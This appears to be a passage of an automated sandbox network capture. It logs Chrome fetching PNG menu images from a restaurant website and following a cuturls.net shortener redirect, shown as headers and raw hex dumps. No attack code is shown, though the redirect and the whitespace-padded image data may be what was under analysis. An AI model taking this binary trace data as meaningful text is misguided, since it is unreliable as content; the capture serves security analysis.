                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: bd ea c4 67 4b 90 91 ad 9a d1 c6 7f 0d 89 be a3 47 de 3e 44 ca 02 68 08 97 da e3 57 4b 6e 92 df bb 97 bd 63 3e 3e e1 b9 65 8c b3 60 f1 a9 b2 80 7c ba 96 86 6e 99 18 9b 2e 0c db 4e d3 06 89 82 e8 12 28 fc 47 67 ee f8 fc 4d 57 e0 95 36 7d 87 27 26 7d 4d 91 23 0d 2c 3e da 8f a0 b6 69 b7 5e ac c4 7c c0 56 38 62 39 40 73 b9 1c 13 5f dd 6a ac 4b 91 d8 06 6d 09 db c6 1e 42 89 aa 8d a7 68 e8 cd 94 74 ee c9 85 b6 48 02 bc 51 06 94 0f 59 ef c9 ab f5 ab 89 c5 93 2f 55 ee f9 f9 78 e4 eb cd c8 f6 d4 7c 23 8f f0 bf cb aa bb 4f 59 ee 4d b5 ec 99 b9 40 e9 76 89 a3 8c 8e 7a df f0 d2 df de a0 5f 97 bd 1b 17 4e 6d b0 a3 80 72 59 3d c9 5c f3 d4 7c ab 5a 7b b6 e4 06 15 d5 8f 49 9f b6 3c 2f 2b 6d d2 6c 76 ad bd 36 ac 38 70 a3 16 58 90 0b 55 ba 6a 71 e3 4e ad 68 29 6a 66 26 cd
                                                                                                                                                    Data Ascii: gKG>DhWKnc>>e`|n.N(GgMW6}'&}M#,>i^|V8b9@s_jKmBhtHQY/Ux|#OYM@vz_NmrY=\|Z{I</+mlv68pXUjqNh)jf&
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 04 0b 7f 64 f1 bf 6d 22 85 79 0c 47 c2 3b 6a de 4a b6 32 59 46 a6 35 56 35 0c 14 0f 17 6d 5b 32 e8 a3 43 d6 50 bd 4c 56 84 07 1d 82 fc 0d 69 31 8b 44 ab 73 71 42 7e 99 a3 93 5b 78 38 5a 89 47 22 b2 dc 1a bc 2a c2 cb 7d d0 49 15 f1 97 fd f3 ce ad e3 4d 71 de a1 4a df 0a b1 14 87 4f 65 6a 56 11 4c 2e 10 12 06 62 05 50 cd 52 d6 e3 c0 1e 1f 11 52 46 c5 38 d4 32 69 73 c4 71 a3 2c 3c 04 a5 d2 2a cf 20 36 0d a8 7d b4 e3 90 41 e2 3f d1 51 aa 80 69 18 58 f7 69 7f 11 0a 4e 33 19 f8 b5 c5 44 f3 12 7b a4 df e3 4c 1a ad 5e 3c 2a ec cb 13 c7 2a 64 60 cc 75 5b b3 e3 48 64 01 cc 91 0b 6b e6 3e 14 d3 cf 8d 25 55 1b b9 77 1e cf 23 9b d3 4a 9b dc 9b d7 b8 52 6a b7 2a a2 b7 d6 5f 23 25 81 b4 39 27 fb 29 ff 00 55 20 60 1d 41 1f 0a 48 ec 69 de d8 63 7a ae 06 40 ff 00 09 0b 4b
                                                                                                                                                    Data Ascii: dm"yG;jJ2YF5V5m[2CPLVi1DsqB~[x8ZG"*}IMqJOejVL.bPRRF82isq,<* 6}A?QiXiN3D{L^<**d`u[Hdk>%Uw#JRj*_#%9')U `AHicz@K
                                                                                                                                                    2024-10-01 04:26:47 UTC16336INData Raw: 8e ac ea 3b 85 80 36 b8 bd 04 ce cf 5c e6 69 d8 88 8d b4 28 f8 9a ab 2e 66 6c 6d 1c 33 42 1f 52 f8 be 15 cb c5 9f da 62 55 8e 41 f1 9d 3c b8 3d c5 01 94 63 3f 08 72 58 84 b2 80 1a f1 fc 07 3b d0 39 24 99 72 25 38 ea 24 91 dc 2d 8f c0 76 d1 78 dc 61 c1 ef bf 24 53 6b f6 9f 85 03 c3 cc 5c 59 57 22 4b fb af 76 55 ed b5 66 cc 71 b7 00 a3 d6 fc a5 e0 56 1c 9b 4d a4 b9 10 7d 0e ee 65 90 6a 60 10 db b3 e6 5a 2f 1b 0d 6f 38 5b dc 90 14 76 55 0f 6e 6d d7 39 32 23 55 10 34 7a 8b 93 c8 8a 29 0c be d8 2e 0d 8f 68 f8 d6 0e f2 bd c2 06 d7 10 09 23 5d e4 31 c2 5f bf 7e ed f9 1a c0 f5 c2 15 66 89 fc f2 0d 04 76 8a e8 92 49 1c 69 1a 30 2d ee 35 f8 57 32 eb 69 56 4c f0 b0 9b 69 e2 ab e9 fb d5 5d b2 7f 14 37 84 34 24 99 cf 56 59 65 12 b4 be 47 d0 9f 65 11 e8 ac 63 91 99 36
                                                                                                                                                    Data Ascii: ;6\i(.flm3BRbUA<=c?rX;9$r%8$-vxa$Sk\YW"KvUfqVM}ej`Z/o8[vUnm92#U4z).h#]1_~fvIi0-5W2iVLi]74$VYeGec6
                                                                                                                                                    2024-10-01 04:26:47 UTC48INData Raw: 47 7c 58 f6 72 aa 39 98 cd 73 34 63 f1 2d de 1e aa bb 6b 52 f8 c5 8f 3a a9 20 14 65 75 2e 39 f6 8f 81 a8 41 f6 ce ae df 8d 5d dc 30 ca 31 c8 84
                                                                                                                                                    Data Ascii: G|Xr9s4c-kR: eu.9A]01
                                                                                                                                                    2024-10-01 04:26:47 UTC1486INData Raw: 5c 9f 1a fc 7e da 1a 93 a5 ae 4f 3a 07 11 c8 6e 38 03 a4 df fb 7e da 19 97 82 27 03 db e1 6e ca 20 41 52 7e 07 95 35 40 b1 3d b5 99 c0 6d 0c d0 a4 ae a2 62 77 be 9b 87 71 56 8f 21 01 04 71 ff 00 a9 e9 7a 7f 4b 75 de 57 4a c8 9b 37 53 b3 49 88 78 63 e6 5a e5 07 92 1c cf ff 00 2b fd ea d5 4f 06 bb 91 40 b7 0d a5 33 e2 78 a5 50 75 5c 10 45 c1 fb d4 18 dd b1 9a bd 21 64 55 c8 35 de 74 f4 71 22 89 10 86 56 00 a9 06 e1 81 ed 5a f7 2a e2 bb 0f 51 e7 fe 5d b8 c4 cc 0f 97 b2 93 c5 87 17 c7 bf a3 d5 0f c9 5d 8f 0f 33 1f 71 81 32 f0 e4 59 60 90 6a 47 53 70 45 6d 46 0e 2c 4c 59 31 9c 66 8c b1 48 56 f4 bc ab d4 50 24 4c 94 c3 c2 ac 1a 89 96 a5 49 22 22 c6 e3 fd 15 84 fc cd e8 83 d5 5b 71 c9 c3 17 cf c6 1c 17 f8 89 e7 83 fd ca de 11 5e 5b 2f 3f ec a0 74 0f b8 b2 36 86
                                                                                                                                                    Data Ascii: \~O:n8~'n AR~5@=mbwqV!qzKuWJ7SIxcZ+O@3xPu\E!dU5tq"VZ*Q]]3q2Y`jGSpEmF,LY1fHVP$LI""[q^[/?t6


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    64192.168.2.449830162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:47 UTC402OUTGET /assets/imgs/menu_imges/Chicken_Tikka_Kabab.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:47 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:47 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 18:55:42 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 43281
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:47 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:47 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 55 00 00 00 63 08 06 00 00 00 ea d6 4c ea 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRUcLpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:47 UTC10865INData Raw: 61 9d c5 c4 09 52 08 82 30 20 57 08 11 4a d1 eb 4b d2 9d 37 39 3e f1 2e d5 87 4a bc fa 5a 8e ab 9b 03 94 35 4c cf e4 90 d1 90 7a 7e c4 ca e9 0a 53 3f bb 84 9e 39 a4 b5 b1 86 d9 19 60 5b 55 be f4 6e 8b 8d de 34 0f 3e b4 c8 bb 6f bf c8 17 bf f5 0a 4f 8f 32 ce ba 98 e1 db 2f 32 3f 5f c6 85 21 eb bb 31 23 97 a1 2b 92 f4 d0 e2 fa 30 51 ad e0 bb 3c de c1 1e 53 15 9f 7e 6a b8 71 65 87 5d 9d 31 68 f7 d9 79 7b 0d d1 ed 43 09 5e 6c b5 e8 ca 3e 4b f7 2a d4 2f 0a 2e 8c 4a 9c 14 31 c7 ae 6b 9a 2a cf e4 ca 22 c5 63 2b 4c cc 59 f6 6f 5f e4 dd 1b 96 81 99 65 b1 a2 c7 cb 9d 14 28 ad 71 26 c1 01 4a 69 90 9a dd 56 b7 74 ed f2 bb e8 5c c9 69 4f 40 73 72 86 b9 a5 63 13 c5 6a a3 60 ad 20 4d c7 0d c0 8e 71 e3 6d 32 e8 61 d3 e4 88 d1 6e 51 92 31 e3 2f 5f c4 c5 03 f2 d1 65 32 39
                                                                                                                                                    Data Ascii: aR0 WJK79>.JZ5Lz~S?9`[Un4>oO2/2?_!1#+0Q<S~jqe]1hy{C^l>K*/.J1k*"c+LYo_e(q&JiVt\iO@srcj` Mqm2anQ1/_e29


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    65192.168.2.449831162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:47 UTC659OUTGET /assets/imgs/menu_imges/Chicken_Korma.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:47 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:47 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:27:54 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 43957
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:47 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 81 00 00 00 4b 08 06 00 00 00 57 d3 e4 82 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRKWpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:47 UTC11189INData Raw: a0 1a 56 50 b5 06 4a 3a 08 59 f2 e2 b3 54 e3 88 ac 2c 82 18 43 9a 8c 98 99 99 25 93 1e 1f f8 cf 1f fc 9b 67 3e f7 99 7f 39 3d dd 24 a8 54 49 a3 84 c0 77 48 d2 9c 2c cd 31 da 84 4a 39 01 77 93 48 ed bd b9 82 74 d0 27 33 55 a2 aa 60 63 ed 3c 8d a9 16 d3 d5 16 7b 51 46 de eb e3 38 50 78 3d 66 4d 4a 3b 8a 99 0a 15 43 40 36 aa ec 0d fa 8c 17 fa d4 df 74 92 af 7f cf 7b d8 79 79 9d ed d5 2b 3c 77 f9 12 fa fc 2e 8f cf 56 f0 8f 2f b1 f2 e8 31 6e c6 07 11 2b 6b dc fc d9 df e2 b5 df fd cd 88 ea 65 5e 78 fa 1a 53 c7 5e cd fc c9 83 7c e2 43 01 d1 60 40 fd 91 83 f4 ee ff 06 1a 32 e0 c0 b7 9e a6 3e bd 8b fa 62 c6 da ae 40 37 1d 76 07 3b 0c eb 31 e1 4c 0d 96 9a f8 7b 1a 33 1a 71 20 4f b1 8e c3 de a4 39 6a 30 48 c9 fb 7b 28 59 76 26 97 ed ad 62 d2 0d 55 b2 b3 d3 24 c6 71
                                                                                                                                                    Data Ascii: VPJ:YT,C%g>9=$TIwH,1J9wHt'3U`c<{QF8Px=fMJ;C@6t{yy+<w.V/1n+ke^xS^|C`@2>b@7v;1L{3q O9j0H{(Yv&bU$q


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    66192.168.2.449832162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:47 UTC661OUTGET /assets/imgs/menu_imges/Meat_Ball_Curry.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:47 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:47 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:44:30 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 37135
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:47 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 4b 08 06 00 00 00 f0 22 90 3c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRZK"<pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:47 UTC4367INData Raw: 2e e2 39 12 32 c0 71 3c 5a 89 cd 54 d4 10 56 22 47 cc 82 e6 c6 3c 2d 19 a5 e5 ba 34 6b 75 2e 9d 0f 58 a9 eb 34 88 51 2c 38 d8 a6 c7 4d ef be 15 73 e2 46 da 41 c8 ad 77 dc cf 0d 33 75 e4 bf fd 35 c4 b9 47 29 46 d2 fc e0 e8 79 76 6f 59 e6 e0 4d 53 7c ef 21 c9 33 9f fa 36 0b 97 eb 84 87 df 4c 7e d7 16 1a c7 0b d4 eb 4d 46 6e df 8b b1 27 8f 66 46 c8 64 36 a3 7b 65 86 c3 25 de f1 e0 4e 06 fb 33 ac cc 2e 92 e8 37 d9 35 19 61 6c cb 5e fc 66 83 f3 cb 1d 5e 3a 77 99 e9 8c cb f6 7e 83 94 e1 33 35 9a 46 3a 0e 5a d2 60 f2 9e 2d d8 a6 4d a3 de 66 a5 ec 50 6c 80 ae e9 28 cf 27 68 b5 10 ba 89 40 43 68 5a af b7 88 0e 0a c2 c0 23 54 a0 e9 5a 7f 3c 16 1d bd 2e eb 08 da 8d 83 ba 69 5a d7 e3 d1 a2 57 7a ac 03 9a 95 24 91 14 e8 7a 8c ca d9 63 84 cd 12 68 10 c9 4f e2 b7 db 34
                                                                                                                                                    Data Ascii: .92q<ZTV"G<-4ku.X4Q,8MsFAw3u5G)FyvoYMS|!36L~MFn'fFd6{e%N3.75al^f^:w~35F:Z`-MfPl('h@ChZ#TZ<.iZWz$zchO4


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    67192.168.2.44983369.162.95.44435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:47 UTC391OUTGET /eWD0j3 HTTP/1.1
                                                                                                                                                    Host: cuturls.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: sid=531b57b9-7fad-11ef-9455-174eec4a577f
                                                                                                                                                    2024-10-01 04:26:47 UTC292INHTTP/1.1 200 OK
                                                                                                                                                    accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                    cache-control: max-age=0, private, must-revalidate
                                                                                                                                                    connection: close
                                                                                                                                                    content-length: 479
                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:47 GMT
                                                                                                                                                    server: Cowboy
                                                                                                                                                    2024-10-01 04:26:47 UTC479INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 73 3a 2f 2f 63 75 74 75 72 6c 73 2e 6e 65 74 2f 65 57 44 30 6a 33 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 7a 63 32 4e 44 41 77 4e 79 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 33 4e 7a 55 32 4f 44 41 33 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62
                                                                                                                                                    Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('https://cuturls.net/eWD0j3?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNzc2NDAwNywiaWF0IjoxNzI3NzU2ODA3LCJpc3MiOiJKb


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    68192.168.2.449834162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:47 UTC405OUTGET /assets/imgs/menu_imges/Afghani_Rice_Mix_Kabab.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:47 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:47 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:11:34 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 39909
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:47 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
